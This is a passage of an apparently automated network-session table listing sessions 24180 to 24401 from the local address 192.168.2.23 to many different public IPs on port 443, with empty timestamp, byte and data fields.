                                          24180192.168.2.235229658.80.245.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24181192.168.2.233531853.19.23.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24182192.168.2.2355476136.39.33.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24183192.168.2.2352524129.189.79.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24184192.168.2.2354732148.155.149.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24185192.168.2.2359706192.93.229.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24186192.168.2.2343004118.81.24.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24187192.168.2.2342652210.139.134.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24188192.168.2.234257679.144.200.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24189192.168.2.235425843.154.114.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24190192.168.2.2348936149.32.250.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24191192.168.2.2347370149.63.40.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24192192.168.2.2351564201.137.160.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24193192.168.2.2341190168.126.182.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24194192.168.2.235849234.192.236.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24195192.168.2.233861287.56.135.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24196192.168.2.2342034211.139.23.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24197192.168.2.2352512151.86.189.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24198192.168.2.234916439.110.199.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24199192.168.2.2346720164.210.68.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24200192.168.2.234352688.33.168.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24201192.168.2.2356480198.33.27.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24202192.168.2.234996679.125.152.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24203192.168.2.234804053.25.100.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24204192.168.2.2360618203.190.200.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24205192.168.2.2347940137.203.248.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24206192.168.2.233858040.155.30.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24207192.168.2.234353249.64.123.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24208192.168.2.2343856198.219.226.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24209192.168.2.235784050.101.111.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24210192.168.2.2351464220.236.215.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24211192.168.2.235439649.227.106.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24212192.168.2.2360740175.194.225.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24213192.168.2.2340528115.180.145.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24214192.168.2.2347010160.31.124.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24215192.168.2.233977079.48.34.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24216192.168.2.2350852132.20.239.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24217192.168.2.2347956201.201.172.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24218192.168.2.235923680.193.109.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24219192.168.2.233773424.25.75.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24220192.168.2.2342860143.101.196.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24221192.168.2.2349046157.65.93.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24222192.168.2.233717838.25.54.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24223192.168.2.2347752159.69.229.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24224192.168.2.2348708172.88.134.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24225192.168.2.233511892.249.117.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24226192.168.2.2345986219.217.195.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24227192.168.2.2339808118.187.58.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24228192.168.2.2342756156.107.225.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24229192.168.2.233635820.189.73.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24230192.168.2.2353062163.212.91.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24231192.168.2.2346054121.103.41.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24232192.168.2.233648265.30.32.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24233192.168.2.2346426153.80.98.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24234192.168.2.2338712188.22.24.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24235192.168.2.234395443.102.108.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24236192.168.2.2346758217.68.88.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24237192.168.2.2349364165.0.80.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24238192.168.2.2334286152.206.62.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24239192.168.2.2345606105.218.64.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24240192.168.2.2344920179.199.75.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24241192.168.2.234008813.113.149.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24242192.168.2.2357632157.198.31.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24243192.168.2.2335962131.104.161.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24244192.168.2.2359984185.86.200.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24245192.168.2.2335902182.46.171.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24246192.168.2.235163232.170.57.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24247192.168.2.235654246.133.227.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24248192.168.2.233373099.243.42.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24249192.168.2.2342792216.180.234.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24250192.168.2.2354770190.111.79.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24251192.168.2.2340374107.164.186.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24252192.168.2.2351726126.248.140.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24253192.168.2.234509435.218.72.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24254192.168.2.2346440188.56.29.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24255192.168.2.2349148181.56.250.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24256192.168.2.2336678120.193.244.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24257192.168.2.233503241.70.38.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24258192.168.2.2347768141.58.132.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24259192.168.2.234725040.36.141.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24260192.168.2.23478565.206.107.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24261192.168.2.23441329.254.193.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24262192.168.2.2339930219.12.62.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24263192.168.2.2348566154.2.154.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24264192.168.2.2349012189.209.246.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24265192.168.2.23345121.119.64.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24266192.168.2.233495695.45.146.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24267192.168.2.233964059.235.95.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24268192.168.2.2351528124.73.196.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24269192.168.2.235124894.127.174.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24270192.168.2.235962247.227.91.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24271192.168.2.2359708146.180.107.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24272192.168.2.2354262110.123.206.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24273192.168.2.2355362189.150.119.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24274192.168.2.2356820189.198.21.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24275192.168.2.2337546144.149.135.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24276192.168.2.234842245.18.154.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24277192.168.2.233417823.104.33.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24278192.168.2.2350808183.25.251.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24279192.168.2.233806068.4.42.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24280192.168.2.2335920177.112.139.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24281192.168.2.2348406143.98.245.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24282192.168.2.2336226138.151.159.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24283192.168.2.234061263.157.4.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24284192.168.2.234169414.49.218.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24285192.168.2.2348264206.234.19.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24286192.168.2.2339892155.85.95.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24287192.168.2.2337324102.191.171.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24288192.168.2.2349086143.61.223.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24289192.168.2.2338842114.147.169.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24290192.168.2.2346366206.173.155.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24291192.168.2.2358982126.54.76.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24292192.168.2.233870460.228.153.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24293192.168.2.2334238132.159.102.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24294192.168.2.2346394117.213.144.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24295192.168.2.2335596210.172.144.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24296192.168.2.2341916185.183.122.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24297192.168.2.2358402129.226.163.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24298192.168.2.2359724110.147.155.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24299192.168.2.235854097.223.247.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24300192.168.2.234441079.225.217.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24301192.168.2.2357224143.124.92.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24302192.168.2.2345374218.197.120.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24303192.168.2.2359092189.177.205.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24304192.168.2.2352872132.228.78.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24305192.168.2.235086281.191.76.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24306192.168.2.2357922162.130.205.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24307192.168.2.2353394212.251.61.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24308192.168.2.2345426112.26.111.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24309192.168.2.23350665.164.158.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24310192.168.2.23488628.135.235.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24311192.168.2.2348546137.10.77.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24312192.168.2.2344658219.40.158.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24313192.168.2.2345312135.135.184.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24314192.168.2.2341590208.241.11.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24315192.168.2.23425542.180.20.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24316192.168.2.2346006110.32.252.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24317192.168.2.2340672211.48.69.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24318192.168.2.233375664.130.236.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24319192.168.2.2356296173.67.103.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24320192.168.2.2343204207.254.175.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24321192.168.2.235237277.113.42.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24322192.168.2.2353184206.91.107.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24323192.168.2.234883869.47.185.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24324192.168.2.2333552222.214.101.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24325192.168.2.2342112129.101.83.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24326192.168.2.233861652.10.210.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24327192.168.2.233344086.158.181.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24328192.168.2.2337276172.72.114.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24329192.168.2.2333596171.20.51.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24330192.168.2.2344868193.236.27.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24331192.168.2.2351480216.146.86.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24332192.168.2.2333968192.215.137.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24333192.168.2.234153825.213.15.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24334192.168.2.2347760144.73.5.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24335192.168.2.2359980124.182.111.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24336192.168.2.2358022141.208.167.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24337192.168.2.235647278.57.79.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24338192.168.2.2357758153.28.101.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24339192.168.2.2334640179.197.64.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24340192.168.2.2346630218.193.232.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24341192.168.2.234659486.86.108.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24342192.168.2.234604613.170.115.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24343192.168.2.234883252.52.184.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24344192.168.2.2360870160.165.198.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24345192.168.2.2357006148.242.53.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24346192.168.2.2352196192.118.63.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24347192.168.2.235410678.130.35.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24348192.168.2.2343514206.122.91.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24349192.168.2.235099424.95.235.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24350192.168.2.2339108158.197.71.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24351192.168.2.235830290.176.248.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24352192.168.2.2353568164.26.130.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24353192.168.2.233378484.78.131.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24354192.168.2.2354914139.28.210.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24355192.168.2.2343946137.180.197.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24356192.168.2.2356272188.138.202.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24357192.168.2.2338978217.22.158.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24358192.168.2.2359100161.42.134.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24359192.168.2.2352292220.221.228.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24360192.168.2.2333188138.47.159.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24361192.168.2.234126414.213.246.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24362192.168.2.233747251.101.28.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24363192.168.2.234646888.197.226.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24364192.168.2.234095617.88.219.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24365192.168.2.2339638133.12.107.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24366192.168.2.234433413.173.101.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24367192.168.2.2345978194.14.46.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24368192.168.2.2359274222.100.129.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24369192.168.2.2359794176.106.40.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24370192.168.2.2343204125.92.5.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24371192.168.2.2358304180.134.69.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24372192.168.2.2337078198.217.114.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24373192.168.2.2348766213.176.96.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24374192.168.2.233482017.154.166.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24375192.168.2.2347658100.164.220.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24376192.168.2.2348560155.184.99.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24377192.168.2.2339744120.145.176.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24378192.168.2.2339676118.119.166.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24379192.168.2.2335322142.18.148.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24380192.168.2.235497478.154.193.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24381192.168.2.2337446167.160.101.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24382192.168.2.2357892221.52.45.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24383192.168.2.2348104176.134.221.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24384192.168.2.2351738124.76.15.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24385192.168.2.235754075.217.176.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24386192.168.2.234129072.6.206.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24387192.168.2.2357876113.156.229.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24388192.168.2.2339496102.50.129.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24389192.168.2.23564145.99.86.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24390192.168.2.235150037.218.138.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24391192.168.2.2345692102.110.159.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24392192.168.2.2347882206.218.43.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24393192.168.2.2341222142.171.182.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24394192.168.2.234861462.216.81.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24395192.168.2.2355564166.255.195.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24396192.168.2.2357956176.35.94.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24397192.168.2.2358434112.112.127.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24398192.168.2.2358816213.214.154.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24399192.168.2.233589877.170.207.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24400192.168.2.2345910184.233.135.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24401192.168.2.2359220209.22.195.138443
                                          TimestampBytes transferredDirectionData


